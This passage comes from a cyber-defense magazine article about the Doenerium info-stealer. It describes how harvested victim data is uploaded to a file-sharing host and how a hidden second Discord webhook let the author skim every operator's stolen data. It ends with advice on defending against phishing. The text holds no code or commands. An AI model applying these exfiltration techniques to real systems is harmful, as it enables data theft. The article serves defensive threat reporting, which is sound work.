After the malware has harvested all the data, it creates a complete virtual profile for the victim, which is
            archived and uploaded to gofile.io – a free file sharing and storing platform. The malware author leverages
            gofile.io to host the archive and share it with the hacker.



            Part Two: The Backdoor Twist

            Further  research  into  the  attack  revealed  that  doener2323,  the  malware  author,  had  also  created  a
            second Github repository called 1337wtf1337. Both accounts were linked using a technique known as
            “Dual Hooking” – in addition to the webhook that the hacker applies to the malware (where exfiltrated
            data is copied), the malware contains an additional Discord webhook associated with doener2323.

            In  other  words,  everything  a  hacker  achieved  using  this  malware  was  automatically  shared  with
            doener2323.

            The  dual  hook  was  removed  on  September  3,  2022,  but  not  before  Doener  created  a  separate,
            completely obfuscated javascript file. When decoded, this file led to an open Discord server for sharing
            the active hackers’ profits and updating the users about new features and fixes.

            Initially, Doener2323 and their partners weren’t shy about informing other Discord users about their goal.
            They openly explained that the purpose was monetization and that the webhook was part of a bigger
            crypto mining operation for Doener2323, which infects any victims that are lured by active hackers using
            Doenerium.
            When other users started catching on, Doener became less enthusiastic about the possibility that they
            might share in the spoils, and removed them from the Discord chat.



            Recommendations


            This attack (and its double-crossing backdoor) teaches us that nothing comes free – not even the stolen
            fruits of malware. The hackers who utilized this publicly accessible malware to steal sensitive data were
            ultimately themselves hacked in turn by a malware author growing their own crypto mining operation.

            Like many dangerous phishing attacks, this sophisticated attack began with a simple email. Considering
            about  1  in  5  phishing  attempts  evade  Microsoft’s  default  security  offering  and  actually  get  to  users’
            inboxes, it is integral that security leaders ensure that their organizations are provided with the most
            advanced safeguards.

            The first line of defense for protecting against this type of attack must be user education around email
            security – regular email security drills can help employees better identify genuine suspicious content and
            remind them not to open strange files, links, or attachments and double-check the identity of the sender.
            Organizations should also establish a standardized process for employees to follow when they receive a
            suspicious email or link.







            Cyber Defense eMagazine – December 2022 Edition                                                                                                                                                                                                         70
            Copyright © 2022, Cyber Defense Magazine. All rights reserved worldwide.